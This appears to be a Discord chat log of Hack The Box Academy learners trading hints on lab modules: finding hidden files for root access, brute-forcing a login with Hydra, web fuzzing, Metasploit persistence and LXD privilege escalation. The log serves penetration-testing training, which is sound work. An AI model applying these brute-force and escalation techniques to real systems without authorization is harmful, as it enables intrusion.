You need to find a way to get to root, one way or the other
that's what I am not able to do
okay, can you tell me how to run LinEnum or linuxprivchecker on the server?
Neither of those are necessary
Look for a folder in /root/
okay
One that was referenced in the reading
I don't recall how I transferred the zip over to the host. But I do recall just unzipping and grabbing the hash
Because you're not looking for hidden items
how do I do that?
okay...my brain has stopped working ig
ty! @fathom pendant I'll try solving it and let you know
ls -la
Lead a horse to water
the horse will drown
Giving the direct command does nothing but give them it. Teaching how to arrive at the flags to use is far more valuable
As the help blurb and man command are fairly useful for learning a command
Anyone knows how to use CDATA METHOD TO READ THE FLAG IN ADVANCED FILE DISCLOSURE SECTION
Make sure the parameters are correct, don't just copy paste
I solved the module @fathom pendant, thank you so much
found a hidden file which helped gain access
without any experience is it better to start first HTB Certified Penetration Testing Specialist or HTB Certified Bug Bounty Hunter
?
They both have different focuses
could you tell me what are the differences ?
CBBH focuses on web app testing, CPTS focuses on network testing
or which one is easier to start with
oh okay thanks for your help, i want to be pentester so i will focus on Certified Penetration Testing Specialist
tbh cbbh easier than cpts
Anyone able to help with this module
https://academy.hackthebox.com/module/57/section/516
Login bruteforcing skills assessment - Service login
I created a custom username and password list and its going to take 5 hours to get through it. After reading other messages about this module the username list and password list should be correct. Any hints to save me 5 hours of time? currently been running for 30 min
Rotate through usernames first
Did u use the -u flag on hydra
I got stuck too
i did
4 may be too high
for pass list i only used his first name and last name, special characters and leet mode as others suggested
Did you trim the list based on the given rules?
Yeah that should be enough
yes i did that as well using sed
i was reading messages about not including numbers so i didnt do that this time around, is that right?
Can anyone tell me why the new web fuzzing module is teaching wenum to fuzz for parameters when we can do that faster and easier already with ffuf and the module and is teaching ffuf...
Honestly is a very old fork from wget...
I would like to Honestly understand why wenum and not keep using ffuf
It's just showcasing different tools
follow the password policy
Also it's a fork of wfuzz not wget
hello everyone, this is my first time here. I actually want to unlock the linux fundamentals module but on clicking the "unlock 10" it just resizes my UI and doesn't let me unlock it (I do have more cubes than it requires). Any suggestion ?
Pretty sure it's the same as the one he demonstrates
i did in my initial one where it ran for 1 hour and found nothing. Let me try it one more time(i thought it was odd people were suggesting lists that went against the policy)
^ this was without -u though
Yeah i guess the idea maybe is just to show you that is the methodology and not the tool.
But maybe it could be misleading for more novice learners
Turn off adblock
I dont know whatever xD
I mean it's a t0 module. You don't have to use the tool
Yeah i kept using ffuf
I found the techniques useful ¯\_(ツ)_/¯
I felt very comfortable with the tool and have zero reason to mess with what i already can use effectively
thanks a lot man , it worked
That clip stood out to me as well. It could be phrased better by separating the features they're discussing or by noting fileless and persistent are mutually exclusive. Once you've configured the meterpreter to persist across reboots it has to reside somewhere. Unless you've got a script that redownloads it each time, but that's still planting an artifact.
I'm definitely a metasploit noob though, so correct me if I'm wrong. Maybe there's trickery like embedding in the registry that's considered "fileless".
You get it?
Fileless is kind of a misnomer tbh
running now, we will see in the next 6 hours lol
is it the registry thing, or piggybacking in an existing file?
It should take less than 20 secs
Registries and piggybacking
can i dm you
Yea
Ah, great. Thank you.
I feel like with hacking there's an ever-growing list of things that make me say "huh? I don't fully get that but I'm sure I'll pick up on it someday". Cross one off the list.
It's kind of more a means to say that the exploit isn't on the disk of the system it's running against
is it possible to follow the lxd tutorial into a docker container ? given that they have the same goal, is this going to be a problem? because I'm lazy to create a virtual machine :/
but there's no choice if you have to do it :/
just follow the docker? cmds will be different. i mean i guess you can wing it but its your life. you will invariably encounter docker containers in both professional and research (lab) contexts... If you prefer another platform its kinda a necessary evil, unfortunately, i find.
uh no I misunderstood, in the section they say to follow the tutorial to install lxd but then I wondered if it was possible to install it in a Docker container knowing that they have the same goal, but finally I warmed up to install a virtual machine with ubuntu 16.04.
oh right, yeah just install lxd then
You do it on the target machine
No need to do it on your system
lxd/lxc is already installed on the target alongside the image to use
hey guys
I need help
nothing is going through can somebody set up a one time use encrypted email
for me
@here
no
somebody did it for me before
wtf rule am i breaking
Yeah it's true I'm taking my head a little too much. I thought you had to practice on a lab
also i'd heavily advise against sharing your email in a server that's full of hackers my guy, not everyone here is reputable
@everyone fuck this server


